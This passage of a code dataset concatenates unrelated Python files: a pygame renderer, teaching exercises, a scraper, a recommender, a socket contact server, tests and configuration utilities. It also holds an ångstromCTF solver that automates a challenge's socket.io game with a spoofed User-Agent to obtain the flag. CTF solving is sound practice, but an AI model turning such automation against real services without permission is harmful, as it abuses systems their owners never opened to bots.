TextRendererBase.__init__(self)\n self._outlinesize = outlinesize\n self._inner_text = TextImg(font, color, size)\n self._outer_text = TextImg(font, outercolor, size)\n\n def _render(self):\n self._image = pygame.Surface((self._inner_text.render_width() + 2 * self._outlinesize,\n self._inner_text.render_height() + 2 * self._outlinesize), pygame.SRCALPHA)\n self._image.set_alpha(0)\n for x in range(0, 2 + 1):\n for y in range(0, 2 + 1):\n if not (x == 1 and y == 1):\n self._outer_text.render(self._image, x * self._outlinesize, y * self._outlinesize)\n self._inner_text.render(self._image, self._outlinesize, self._outlinesize)\n self._rect = self._image.get_rect()\n\n def set_text(self, text):\n if self._inner_text.get_text() == text:\n return\n self._image = None\n self._inner_text.set_text(text)\n self._outer_text.set_text(text)\n\n def render(self, screen, x, y, text=None):\n if text is not None:\n self.set_text(text)\n if self._image is None:\n self._render()\n self._rect.topleft = (x, y)\n screen.blit(self._image, self._rect)\n\n\nclass Gradient():\n def __init__(self, width, height, topcolor, bottomcolor):\n self._image = pygame.Surface((width, height), pygame.SRCALPHA)\n self._image.set_alpha(0)\n self._rect = self._image.get_rect()\n color = pygame.Color(\"black\")\n for y in range(0, height):\n scale = y / float(height)\n color.r = int((topcolor.r * (1 - scale)) + (bottomcolor.r * scale))\n color.g = int((topcolor.g * (1 - scale)) + (bottomcolor.g * scale))\n color.b = int((topcolor.b * (1 - scale)) + (bottomcolor.b * scale))\n color.a = int((topcolor.a * (1 - scale)) + (bottomcolor.a * scale))\n pygame.draw.line(self._image, color, (0, y), (width - 1, y))\n\n def render(self, screen, x, y):\n self._rect.topleft = (x, y)\n screen.blit(self._image, self._rect)","repo_name":"sammessina/informant","sub_path":"src/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":4807,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"23005448925","text":"# ============================================================================ #\n# problem 1\n\n# Locally, i.e. within the scope of swap, this actually does perform a triangle\n# exchange. That means, the local variables x_swap and y_swap now reference \n# memory cells such that they have the other variables initial value.\n# However, this is disconnected from the state of the module level: neither \n# x_main nor y_main \"see\" any of the effects done to x_swap and y_swap.\n# \n# memory model:\n#\n# --------+--------+--------+--------+--------+--------+--------+--------+------\n# 100 | 101 | 103 | 104 | 105 | 106 | 107 | 108 | ...\n# x_main | y_main | x_swap | y_swap | | | | |\n# -> 105 | -> 106 | -> 107 | -> 108 | 2 | 3 | 3 | 2 |\n#\n# (rows in this picture signify: memory address, variable name, content of the\n# memory cell)\n\n\n# ============================================================================ #\n# problem 2\n\nprint(\"PI MONTE CARLO APPROXIMATION\")\n\nimport random\n\ndef getPi(accuracy) :\n N = 0\n\n for run in range(accuracy) :\n x = random.uniform(0, 1)\n y = random.uniform(0, 1)\n\n if x*x + y*y < 1 : N += 1\n\n return 4 * N/accuracy\n\nfor p in range(10, 15) :\n accuracy = 2**p\n print(f\"accuracy: {accuracy:7}, pi ~ {getPi(accuracy)}\")\n\nprint()\n\n\n# ============================================================================ #\n# problem 3\n\nprint(\"### INTEGRAL (I)\")\n\nimport math\n\ndef integrate(func, start, stop, N) :\n result = 0\n width = (stop - start) / N\n\n for i in range(N) :\n x = start + i * width\n result += func(x) * width\n\n return result\n\nprint( integrate(math.exp, 0, 1, 10000) )\n\n\n# ============================================================================ #\n# problem 4\n\nprint(\"RANDOM WALK\")\n\nimport random # already imported from task 2, but importing it a second time does precisely nothing\n\n# obligatory part with optional extension 1:\n# Basic Simulation with finite width of the road\ndef simulateDrunkard(N, bias, W) :\n drift = 0\n for step in range(N) :\n r = random.uniform(0, 1)\n\n if r < bias :\n if drift != -W : drift -= 1\n else :\n if drift != +W : drift += 1\n\n return drift\n\n\n# optional extension 2: generation of the histogram list\ndef getHistogram(K, N, bias, W) :\n outcomes = [simulateDrunkard(N, bias, W) for i in range(K)]\n return {d : outcomes.count(d) for d in range(-W, W+1)}\n\n\n# optional extension 3: display histogram as chart\ndef showHistogram(histogram) :\n for d, v in histogram.items() :\n print(f\"{d:+3}\", \"#\" * v)\n\n\n# driver code\nruns = 500 # how often to send the drunkard down the road\nN = 21 # how many steps to take\nB = 10 # width of the road\npLeft = 0.5 # bias to the left (go left 100% of the time --> 1)\n\nprint(\"three random outcomes:\")\nprint( simulateDrunkard(N, pLeft, B) )\nprint( simulateDrunkard(N, pLeft, B) )\nprint( simulateDrunkard(N, pLeft, B) )\nprint()\n\nprint(\"histogram data:\")\nhistogram = getHistogram(runs, N, pLeft, B)\nprint( histogram )\n\nprint(\"histogram plot:\")\nshowHistogram( histogram )\n","repo_name":"TheBlueChameleon/Py_Exos_Reduced","sub_path":"X06/06-solutions.py","file_name":"06-solutions.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"1806554346","text":"import pprint\n\nmessage = 'Today is Friday. It is a rainy day.'\ncount = {}\n\nfor character in message.upper():\n count.setdefault(character, 0)\n count[character] = count[character] + 1\n\n# rjtext = pprint.pformat (count)\n# print (rjtext)\n\npprint.pprint (count)\n","repo_name":"radoaller/learnpython","sub_path":"Counting Characters.py","file_name":"Counting Characters.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27365965823","text":"from selenium import webdriver\nimport time\nimport pymysql\n\n\n#获得音乐的id\ndef getId():\n try:\n arr=[]\n browser = webdriver.Chrome('/usr/local/bin/chromedriver')\n browser.get(\"https://music.163.com/#/discover/toplist?id=3779629\")\n iframe_elemnt = browser.find_element_by_id(\"g_iframe\")\n # iframe_elemnt = browser.find_element_by_id(\"g_iframe\")\n browser.switch_to.frame(iframe_elemnt)\n elements = browser.find_elements_by_xpath('//tr')\n for item in elements:\n id = item.get_attribute('id')\n arr.append(id[:10])\n print(id)\n return arr\n except:\n print('获得id失败')\n return ''\n\n\n\n\ndef main():\n list = getId() \n print(list)\n\nmain()","repo_name":"joshuaaam/-scrapy-","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36935476859","text":"import numpy as np\nimport numpy.random as rand\nimport pickle\nimport json\nimport pandas\nfrom subprocess import call\n\nclass Podcast:\n def __init__(self, title, vec, rss):\n self.title = title\n self.vec = np.array(vec)\n self.rss = rss\n\n def cosine(self, p):\n v = p.vec\n num = np.dot(v,self.vec)\n denom = np.linalg.norm(self.vec) * np.linalg.norm(v)\n\n res = num / denom\n\n return res\n\ndef add_like(user_id, title):\n liked = {}\n try:\n with open(\"likes.json\", \"r\") as flike:\n liked = json.load(flike)\n except FileNotFoundError as ex:\n print(\"No file found, setting liked = {}\")\n\n\n\n if not user_id in liked:\n liked[user_id] = []\n\n if not title in liked[user_id]:\n liked[user_id].append(title)\n\n try:\n with open(\"likes.json\", \"w\") as flike:\n json.dump(liked, flike)\n except FileNotFoundError as ex:\n print(\"No file found, setting liked = {}\")\n\n return json.dumps(liked[user_id])\n\ndef get_rec(user_id, n = 1):\n liked = {}\n try:\n with open(\"likes.json\", 'r') as flike:\n liked = json.load(flike)\n except FileNotFoundError as ex:\n print(\"No file found, setting liked = {}\")\n\n df = pandas.read_json(\"trained_embeddings.json\")\n podcasts = {\n row['title']:\n Podcast(row['title'], row['vector'], row['rss']) \n for i, row in df.iterrows()}\n\n if user_id not in liked:\n print(\"USER NOT FOUND\")\n return \"\"\n\n distances = {title:1 for title, podcasts in podcasts.items()}\n for title in liked[user_id]:\n temp_distances = [(podcast.title, podcasts[title].cosine(podcast)) for _, podcast in podcasts.items()]\n for p_title, distance in temp_distances:\n distances[p_title] *= distance\n \n res_dists = [(k, d) for k, d in distances.items() if d != 0]\n\n res_dists.sort(key=lambda kv: kv[1])\n\n \n return [\n {\n 'title':podcasts[title].title, \n 'rss':podcasts[title].rss\n }\n for title, dist in res_dists[:n]]\n\nadd_like(\"cjen1\", \"Nobody Told Me!\")\n\n","repo_name":"Cjen1/HackMIT-Recommends","sub_path":"server/recommend.py","file_name":"recommend.py","file_ext":"py","file_size_in_byte":2145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37170036724","text":"from contact import Contact\n\nimport socket\nimport os\nimport threading\nimport xml.etree.ElementTree as ET\nimport pickle\n\n#Constant Information\nIP = socket.gethostbyname(socket.gethostname())\nPORT = 9999\nADDR = (IP, PORT)\nFORMAT = \"utf-8\"\nSIZE = 1024\n\n#All command\nCOMMAND = { \n 0: \"!DISCONNECT\",\n 1: \"!DISPLAY_LIST\",\n}\n\n#Load phonebook and contact\nphonebook = ET.parse('phonebook.xml') #Open file\ncontact = phonebook.findall('contact') #Open as tree\n\n#Make list contact from tree\ndef compileContactList() -> bytes:\n ls = []\n for c in contact:\n ls.append(compileFromTree(c))\n\n return ls\n\n#Find by name\ndef findByName(name: str):\n result = []\n for c in contact:\n if c.find('name').text == name:\n result.append(compileFromTree(c))\n return result\n\n#Find by phone\ndef findByPhone(phone: str):\n result = []\n for c in contact:\n if c.find('phone').text == phone:\n result.append(compileFromTree(c))\n return result\n\n#Find by email\ndef findByEmail(email: str):\n result = []\n for c in contact:\n if c.find('email').text == email:\n result.append(compileFromTree(c))\n return result\n\n#Find contact and return the contact\ndef findContact(msg: str):\n foundContacts = []\n\n if msg[6:10] == 'NAME':\n foundContacts = findByName(msg[11:])\n elif msg[6:10] == 'NUMB':\n foundContacts = findByPhone(msg[11:])\n elif msg[6:10] == 'MAIL':\n foundContacts = findByEmail(msg[11:])\n\n #Check return information\n if foundContacts:\n result = foundContacts\n else:\n result = []\n\n return result\n\n#Create a contact from tree Element\ndef compileFromTree(info: ET.Element) -> Contact:\n file = open(f\"photo\\\\{info.attrib['id']}.jpg\", 'rb')\n data = file.read()\n return Contact(info.find('name').text, info.attrib['id'], info.find('phone').text, info.find('email').text, data)\n\n# Hoat dong/code chinh trong phan nay\ndef handle_client(clientSocket, clientAddr):\n print(f\"[CONNECTION] {clientAddr} connected.\")\n\n connected = True\n while connected:\n msg = clientSocket.recv(SIZE).decode(FORMAT)\n if not msg:\n continue\n\n if msg == COMMAND[0]:\n connected = False\n continue\n elif msg == COMMAND[1]:\n result = compileContactList()\n elif msg[1:5] == 'FIND':\n result = findContact(msg)\n else:\n print(f'[{clientAddr}] Unknown message: {msg}')\n continue\n \n respond = pickle.dumps(result)\n respondSize = len(respond)\n \n clientSocket.send(str(respondSize).encode(FORMAT))\n clientSocket.send(respond)\n\n clientSocket.close()\n print(f\"[DISCONNECT] {clientAddr} Disconnected.\")\n\n\ndef main():\n os.system('cls')\n print(\"[STARTING] Server is starting\")\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind(ADDR)\n server.listen()\n print(\"[LISTENING] Waiting for client\")\n while True:\n conn, addr = server.accept()\n thread = threading.Thread(target = handle_client, args=(conn, addr))\n thread.start()\n\n print(f\"[CONNECTION] Active connection: {threading.active_count() - 1}.\")\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CorvoLieu/Socket-Dev","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70314730723","text":"#!/usr/bin/python\n\nimport requests\nimport time\nimport math\n\nverbose = True\n\ntarget_site = \"https://wooooosh.2020.chall.actf.co/\"\ntarget_endpoint_without_sid = target_site + \"socket.io/?EIO=3&transport=polling&t={}\"\ntarget_endpoint = target_endpoint_without_sid + \"&sid={}\"\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);\", \n \"Content-Type\": \"text/plain;charset=UTF-8\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Origin\": \"https://wooooosh.2020.chall.actf.co\",\n \"Referer\": \"https://wooooosh.2020.chall.actf.co/\",\n}\n\ndef log_message(message):\n if verbose:\n print(message)\n\n\ndef log_data(answer):\n if verbose:\n print(\"-----------------------------------\")\n print(answer)\n print(\"-----------------------------------\")\n\n\ndef get_sid_from_cookies(cookies):\n sid = None\n #log_message(\"[*] Cookies:\")\n for cookie in cookies:\n #log_message(\"[*] - {}={}\".format(cookie.name, cookie.value))\n if cookie.name == \"io\":\n sid = cookie.value\n #log_message(\"[*] Found sid: {}.\".format(sid))\n return sid\n\n\ndef generate_t_param():\n timestamp = int(round(time.time() * 1000))\n return yeast_encode(timestamp)\n\n\n# https://github.com/unshiftio/yeast/blob/28d15f72fc5a4273592bc209056c328a54e2b522/index.jsL17\ndef yeast_encode(num):\n alphabet = list(\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz-_\")\n length = len(alphabet)\n encoded = \"\"\n \n while True:\n encoded = alphabet[num % length] + encoded\n num = math.floor(num / length)\n if num <= 0:\n break\n \n return encoded\n\n\ndef generate_payload(payload):\n return \"{}:{}\".format(str(len(payload)), payload)\n\n\ndef generate_start_payload():\n start_payload = generate_payload(\"42[\\\"start\\\"]\")\n #log_data(start_payload)\n return start_payload\n\n\ndef generate_answer_payload(x, y):\n answer_payload = generate_payload(\"42[\\\"click\\\",{},{}]\".format(x, y))\n #log_data(answer_payload)\n return answer_payload\n\n\nt = generate_t_param()\nurl = target_endpoint_without_sid.format(t)\n#log_message(\"[*] Getting sid. {}\".format(url))\nr = requests.get(url, headers=headers)\ncookies = r.cookies\n#log_data(r.text)\nsid = get_sid_from_cookies(cookies)\n\nt = generate_t_param()\nurl = target_endpoint.format(t, sid)\n#log_message(\"[*] Starting the game. {}\".format(url))\nr = requests.post(url, headers=headers, cookies=cookies, data=generate_start_payload())\ncookies = r.cookies\n#log_data(r.text)\n\n#log_message(\"[*] Playing the game.\")\nscore = \"\"\nstart_time = int(round(time.time() * 1000))\nbad_gateway_retries = 0\nwhile True:\n\n while True:\n t = generate_t_param()\n url = target_endpoint.format(t, sid)\n #log_message(\"[*] Polling. {}\".format(url))\n r = requests.get(url, headers=headers, cookies=cookies)\n cookies = r.cookies\n content = r.text\n #log_data(content)\n \n if r.status_code == 502:\n bad_gateway_retries += 1\n t = generate_t_param()\n url = target_endpoint_without_sid.format(t)\n #log_message(\"[*] Getting sid. {}\".format(url))\n r = requests.get(url, headers=headers)\n cookies = r.cookies\n #log_data(r.text)\n sid = get_sid_from_cookies(cookies)\n else:\n break\n \n if \"actf{\" in content:\n print(\" \")\n print(\"[*] =====================================\")\n print(\"[*] =====================================\")\n print(\"[*] =====================================\")\n print(\"[*] vvvvvvvvvvvv FLAG FOUND! vvvvvvvvvvvv\")\n print(\" \")\n print(content)\n print(\" \")\n print(\"[*] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\")\n print(\"[*] =====================================\")\n print(\"[*] =====================================\")\n print(\"[*] =====================================\")\n print(\" \")\n break\n elif \"terrible\" in content or \"disconnected\" in content:\n end_time = int(round(time.time() * 1000))\n total_time = (end_time - start_time) / 1000\n print(\"[*] FAILED! Score: {} ({} secs, {} 502 retries)\".format(score, str(total_time), str(bad_gateway_retries)))\n break\n elif \"shapes\" in content:\n #log_message(\"[*][shapes] Response intercepted.\")\n coordinates = content[21:34].replace(\"{\", \"\").replace(\"}\", \"\").replace(\"[\", \"\").replace(\"]\", \"\").replace(\"\\\"\", \"\").replace(\"x\", \"\").replace(\"y\", \"\").replace(\":\", \"\")\n best_x = coordinates.split(\",\")[0]\n best_y = coordinates.split(\",\")[1]\n #log_message(\"[*][shapes] The best position is at {}, {}.\".format(best_x, best_y))\n if \"score\" in content:\n score = content[-5:-1].replace(\"]\", \"\").replace(\",\", \"\").replace(\"\\\"\", \"\").replace(\"e\", \"\")\n #log_message(\"[*][shapes] Score: {}.\".format(score))\n t = generate_t_param()\n url = target_endpoint.format(t, sid)\n #log_message(\"[*] Send answer. {}\".format(url))\n r = requests.post(url, headers=headers, cookies=cookies, data=generate_answer_payload(best_x, best_y))\n cookies = r.cookies\n content = r.text\n #log_data(content)\n elif \"score\" in content:\n #log_message(\"[*][score] Response intercepted.\")\n score = content[-5:-1].replace(\"]\", \"\").replace(\",\", \"\").replace(\"\\\"\", \"\").replace(\"e\", \"\")\n #log_message(\"[*][score] Score: {}.\".format(score))","repo_name":"m3ssap0/CTF-Writeups","sub_path":"ångstromCTF 2020/Woooosh/solver-woooosh.py","file_name":"solver-woooosh.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"54"} +{"seq_id":"16923692544","text":"from __future__ import annotations\n\nfrom concurrent.futures import CancelledError\n\nimport pytest\n\nfrom nwave import task\n\n\ndef test_task():\n # Create a Task\n t = task.Task(\"src.wav\", \"dst.wav\", [], True)\n assert isinstance(t, task.Task)\n\n\ndef test_task_result():\n # Check basic creation of TaskResult\n t = task.Task(\"src.wav\", \"dst.wav\", [], True)\n tr = task.TaskResult(t, None)\n assert isinstance(tr, task.TaskResult)\n assert tr.success\n assert tr.error is None\n\n # Check str representation\n assert str(tr) == \"Task: src.wav -> dst.wav\\n[Completed]\"\n\n # Check str for canceled task\n tr = task.TaskResult(t, CancelledError())\n assert str(tr) == \"Task: src.wav -> dst.wav\\n[Cancelled]\"\n\n # Check str for failed task\n tr = task.TaskResult(t, ValueError(\"test\"))\n assert str(tr) == \"Task: src.wav -> dst.wav\\n[Failed]: test\"\n\n\ndef test_task_exception():\n # Create a TaskException\n te = task.TaskException(ValueError(\"VE\"))\n assert str(te) == \"VE\"\n with pytest.raises(task.TaskException):\n raise te\n\n # Test raising info\n te = task.TaskException(ValueError(\"VE\"), during=\"Step-1\")\n try:\n raise te\n except task.TaskException as e:\n assert str(e) == \"During Step-1 -> ValueError: VE\"\n","repo_name":"ionite34/nwave","sub_path":"tests/test_task.py","file_name":"test_task.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"10908137067","text":"\"\"\" syspath_utils module. \"\"\"\nimport os\nimport re\nimport sys\nfrom itertools import chain\nfrom pathlib import Path, PurePath\nfrom string import Template\nfrom types import ModuleType\nfrom typing import Dict, List, Optional, Pattern, Set, Tuple, Union\n\nfrom .syspath_path_utils import get_project_root_dir\nfrom .syspath_sleuth import get_customize_path\n\n_STD_SYSPATH_FILTER: Union[None, Pattern] = None\n\nPATH_TO_PROJECT_PLACEHOLDER = \"path_to_project\"\n\n\ndef init_std_syspath_filter(std_syspath_filter: Pattern) -> None:\n \"\"\"\n Provide a globally bound standard filter Pattern applied to all subsequent sys.path filtering\n operations. Note: a init_std_syspath_filter() is called from __init__.py to default to a\n globally applied pattern.\n :param std_syspath_filter: pattern to apply to all filter operations. Can be None.\n :return: None\n \"\"\"\n # pylint: disable=global-statement\n global _STD_SYSPATH_FILTER\n # pylint: enable=global-statement\n _STD_SYSPATH_FILTER = std_syspath_filter\n\n\ndef filtered_sorted_syspath(\n path_filter: Pattern = None,\n no_filtering: bool = False,\n sort: bool = False,\n unique: bool = False,\n) -> List[str]:\n \"\"\"\n Filter and sort the sys.path for only paths of interest.\n :param path_filter: a pattern that the caller can provide in addition to the std_syspath_filter\n :param no_filtering: allow user to not filter at all\n :param sort: allow caller to sort the filtered (if filtering) sys.path\n :param unique: allow caller to only return unique members of sys.path\n :return: sys.path with filtering and sorting applied\n \"\"\"\n paths: List[str] = sys.path\n if not no_filtering:\n path: str\n if _STD_SYSPATH_FILTER:\n paths = [path for path in paths if not re.search(_STD_SYSPATH_FILTER, path)]\n if path_filter:\n paths = [path for path in paths if not re.search(path_filter, path)]\n\n if sort:\n paths = sorted(paths, reverse=True)\n\n if unique:\n unique_paths: List[str] = []\n for path in paths:\n if path not in unique_paths:\n unique_paths.append(path)\n\n paths = unique_paths\n\n return paths\n\n\ndef print_syspath(\n path_filter: Pattern = None, no_filtering: bool = False, sort: bool = True, unique: bool = False\n) -> None:\n \"\"\"\n Filter and sort the sys.path for only paths of interest.\n :param path_filter: a pattern that the caller can provide in addition to the std_syspath_filter\n :param no_filtering: caller user to not filter at all\n :param sort: allow caller to sort the filtered (if filtering) sys.path\n :param unique: allow caller to only return unique members of sys.path\n :return: None\n \"\"\"\n paths: List[str] = filtered_sorted_syspath(path_filter, no_filtering, sort, unique)\n print(f\"\\nsys.path({len(paths)} paths):\")\n path: str\n for path in paths:\n print(f\"\\t{path}\")\n\n\ndef persist_syspath(\n user_provided_project_dir: Path = None,\n force_pth_dir_creation: bool = False,\n path_filter: Pattern = None,\n) -> None:\n \"\"\"\n Persist a set of ordered [000-999]*.pth.template files that represent each\n project-related entry in the sys.path. The files are persisted into the\n /pathto/projectroot/pths directory. If caller did not supply the /pathto/projectroot via\n 'user_provided_project_dir', attempt to determine that.\n\n :param user_provided_project_dir: root of project using persist_syspath()\n :param force_pth_dir_creation: for directory creation\n :param path_filter: a pattern that the user can provide in addition to the std_syspath_filter\n :return: None\n \"\"\"\n project_dir: PurePath = (\n user_provided_project_dir if user_provided_project_dir else get_project_root_dir()\n )\n\n template_dir: Path = Path(project_dir / \"pths\")\n\n if not template_dir.exists():\n create = force_pth_dir_creation or input(\n f\"Create {template_dir}? [y,n] \"\n ).strip().lower().startswith(\"y\")\n if create:\n template_dir.mkdir(mode=0o766)\n\n sys_paths: List[str] = filtered_sorted_syspath(path_filter, unique=True)\n for index, sys_path_str in enumerate(sys_paths):\n if not sys_path_str.startswith(os.fspath(project_dir)):\n continue\n pth_path = Path(sys_path_str)\n relative_pth: PurePath = pth_path.relative_to(project_dir)\n # A project's root directory is rarely added to sys.path by a targeted application. It is\n # more likely that it was added by python itself when executing a module, e.g.:\n # python -m pytest ... or even when the Pycharm debugger is used. Skipping persisting\n # project_dir in sys.path\n if relative_pth == project_dir:\n continue\n template_path = Path(\n template_dir,\n f\"{index:03d}_{project_dir.stem}_\"\n f\"{os.fspath(relative_pth).replace(os.sep, '_')}.pth.template\",\n )\n\n if template_path.exists():\n continue\n\n with template_path.open(\"x\") as template_path_f:\n # Write template that can be converted to wherever a project's clones are\n # rooted using inject_project_pths_to_site()\n relative_pth = (\n os.sep + os.fspath(relative_pth) if relative_pth != Path(\"root\") else Path(\"\")\n )\n template_path_f.write(f\"${{{PATH_TO_PROJECT_PLACEHOLDER}}}{relative_pth}\\n\")\n\n dedup_pth_templates(template_dir)\n\n\ndef inject_project_pths_to_site(user_provided_project_dir: PurePath = None) -> None:\n \"\"\"\n Iterate through all templates in /pathto/projectroot/pths converting the templates to\n the paths rooted to the current /pathto/projectroot. If caller did not supply the\n /pathto/projectroot via 'user_provided_project_dir', attempt to determine that.\n\n :param user_provided_project_dir: root of project using inject_project_pths_to_site()\n \"\"\"\n project_dir: Path = (\n Path(user_provided_project_dir)\n if user_provided_project_dir\n else Path(get_project_root_dir())\n )\n\n clear_site_pths(project_dir.stem)\n\n template_dir: Path = Path(project_dir / \"pths\")\n if not template_dir.exists():\n print(f\"No pth templates found within {os.fspath(template_dir)}\")\n return\n\n site_path = get_customize_path()[0].parent\n pth_templates = get_pth_templates(template_dir)\n for template_path in pth_templates:\n site_pth_path: Path = site_path / template_path.stem\n with site_pth_path.open(\"w\") as site_pth_path_f:\n site_pth_path_f.write(pth_templates[template_path])\n\n\ndef clear_site_pths(project_name: str) -> None:\n site_path = get_customize_path()[0].parent\n project_site_pth: Path\n for project_site_pth in site_path.glob(f\"[0-9][0-9][0-9]_{project_name}_*.pth\"):\n project_site_pth.unlink()\n\n\ndef dedup_pth_templates(template_dir) -> None:\n \"\"\"\n get_pth_templates dedup's for us; just making it obvious that the return value has no value.\n :param template_dir:\n \"\"\"\n get_pth_templates(template_dir)\n\n\ndef get_pth_templates(template_dir: Path) -> Dict[Path, str]:\n \"\"\"\n For each template in template_dir, fill in template with 'project_name' and clean up any\n templates that would represent the same path being added to sys.path.\n\n :param template_dir:\n :return: dictionary mapping template Path to the filled-in string\n \"\"\"\n substitution_map: Dict[str, str] = {PATH_TO_PROJECT_PLACEHOLDER: os.fspath(template_dir.parent)}\n pth_templates: Dict[Path, str] = {}\n filled_in_path_to_file_map: Dict[str, str] = {}\n templates_paths: List[Path] = list(template_dir.glob(\"*.pth.template\"))\n templates_paths.sort()\n template_path: Path\n for template_path in templates_paths:\n with template_path.open() as template_f:\n template_str = template_f.read().strip()\n\n filled_in_path = Template(template_str).substitute(substitution_map)\n if filled_in_path in filled_in_path_to_file_map:\n # There are duplicate files (ordered differently) that contain the same path to be\n # added to sys.path. The first one wins, all other template files having the same\n # paths for addition to sys.path are deleted.\n print(\n f\"{template_path.name}'s {filled_in_path} already represented with \"\n f\"{filled_in_path_to_file_map[filled_in_path]}.\\n\\tDeleting {template_path.name}\"\n )\n template_path.unlink()\n continue\n\n filled_in_path_to_file_map[filled_in_path] = template_path.name\n\n pth_templates[template_path] = filled_in_path\n\n return pth_templates\n\n\ndef add_srcdirs_to_syspath(user_provided_project_dir: PurePath = None) -> None:\n \"\"\"\n Add all src directories under current working directory to sys.path. If caller did not supply\n the /pathto/projectroot via 'user_provided_project_dir', attempt to\n determine that, walk up ancestry to find a directory containing a 'src' directory. Waking up\n allows for being within in the 'tests' directory when initiating tests against modules under\n 'root/src'.\n\n Searching for 'src' directories is NOT limited to finding the '<project root>/src' (and 'src'\n directories under that '<project root>/src' directory)! All those will be found and added,\n but also any other 'src' directory found under the <project root>/tests tree. This is desired\n since git subprojects may be under 'tests' and their 'src' directories need to be\n included.\n\n :param user_provided_project_dir: root of project using inject_project_pths_to_site()\n\n :return: None\n \"\"\"\n project_dir: Path = (\n Path(user_provided_project_dir)\n if user_provided_project_dir\n else Path(get_project_root_dir())\n )\n\n prior_sys_path = sys.path.copy()\n\n src: Path\n for src in chain.from_iterable([project_dir.glob(\"src\"), project_dir.glob(\"tests/**/src\")]):\n tested_src_str = str(src)\n if src.is_dir() and tested_src_str not in sys.path:\n sys.path.append(tested_src_str)\n\n diff_path_strs: Set[str] = set(prior_sys_path).symmetric_difference(set(sys.path))\n if len(diff_path_strs) > 0:\n diff_path_strs = {Path(diff_path_str).as_posix() for diff_path_str in diff_path_strs}\n print(f\"Added to sys.path: {sorted(diff_path_strs)}\")\n\n\ndef get_package_and_max_relative_import_dots(\n module_name: str,\n) -> Tuple[Optional[str], Optional[str]]:\n \"\"\"\n Derive the fully-qualified package related to already-imported module named by 'module_name'.\n In addition, return the number of relative dots that can be used in that module before either of\n the following occur:\n\n ValueError: attempted relative import beyond top-level package\n ImportError: attempted relative import beyond top-level package\n\n :param module_name: module name of already-imported module\n :return: fully-qualified package and max relative dots.\n \"\"\"\n target_module: ModuleType = sys.modules[module_name]\n dots: str = \"\" if not target_module.__package__ else \".\"\n dot_count: int = target_module.__package__.count(\".\") if target_module.__package__ else 0\n dots: str = dots + \"\".join(\".\" for i in range(0, dot_count))\n return target_module.__package__, dots\n","repo_name":"gkedge/runtime-syspath","sub_path":"src/runtime_syspath/syspath_utils.py","file_name":"syspath_utils.py","file_ext":"py","file_size_in_byte":11322,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13376273876","text":"\"\"\"Main configuration parameters for FastAPI and Lambda powertools\"\"\"\nimport logging\nfrom distutils.util import strtobool\nfrom os import getenv\nfrom pathlib import Path\n\nfrom starlette.config import Config\nfrom starlette.datastructures import Secret\n\nlogger = logging.getLogger(__name__)\n\n# Paths\nAPP_DIR = Path(__file__).resolve().parent\nENV_PATH = APP_DIR / \".env\"\nlogger.info(f\"Loading Django configs environment variables from {ENV_PATH}\")\n\nconfig = Config(env_file=ENV_PATH)\n\n# ======================= SETTINGS.PY =========================\n\n# General settings\nDEBUG: bool = bool(strtobool(getenv(\"DEBUG\", \"True\")))\nSECRET_KEY: Secret = getenv(\"SECRET_KEY\", config(\"SECRET_KEY\", cast=Secret))\nSTATIC_FILES_PATH: str = \"staticfiles/\"\nMEDIA_FILES_PATH: str = \"mediafiles/\"\n\n# Postgres\nPOSTGRES_HOST: str = getenv(\n \"POSTGRES_HOST\", config(\"POSTGRES_HOST\", default=\"localhost\")\n)\nPOSTGRES_PASSWORD: Secret = getenv(\n \"POSTGRES_PASSWORD\", config(\"POSTGRES_PASSWORD\", cast=Secret, default=\"postgres\")\n)\nPOSTGRES_DB: str = getenv(\"POSTGRES_DB\", config(\"POSTGRES_DB\", default=\"portfoliodb\"))\nPOSTGRES_PORT: int = getenv(\n \"POSTGRES_PORT\", config(\"POSTGRES_PORT\", cast=int, default=5432)\n)\nPOSTGRES_USER: str = getenv(\n \"POSTGRES_USER\", config(\"POSTGRES_USER\", default=\"postgres\")\n)\n\n# Redis Cache\n# Get from environment variable, for example if ElastiCache is used,\n# Otherwise assume Redis running in a docker container named \"redis\"\nREDIS_ENDPOINT: str = getenv(\n \"REDIS_ENDPOINT\", config(\"REDIS_ENDPOINT\", default=\"localhost:6379\")\n)\nCACHE_TTL: int = int(getenv(\"CACHE_TTL\", \"60\"))\n\n# Static files served from AWS S3 Bucket\nSTATICFILES_BUCKET: str = getenv(\"STATICFILES_BUCKET\")\nAWS_REGION: str = getenv(\"AWS_REGION\", \"eu-west-2\")\nAWS_S3_CUSTOM_DOMAIN: str = getenv(\n \"AWS_S3_CUSTOM_DOMAIN\", f\"s3.{AWS_REGION}.amazonaws.com/{STATICFILES_BUCKET}\"\n) # E.g. tari.kitchen\n\n# Forward ContactForm emails to AWS SNS Topic\nSNS_TOPIC_ARN: str = getenv(\"SNS_TOPIC_ARN\", config(\"SNS_TOPIC_ARN\", default=None))\n\n# SES identity for email 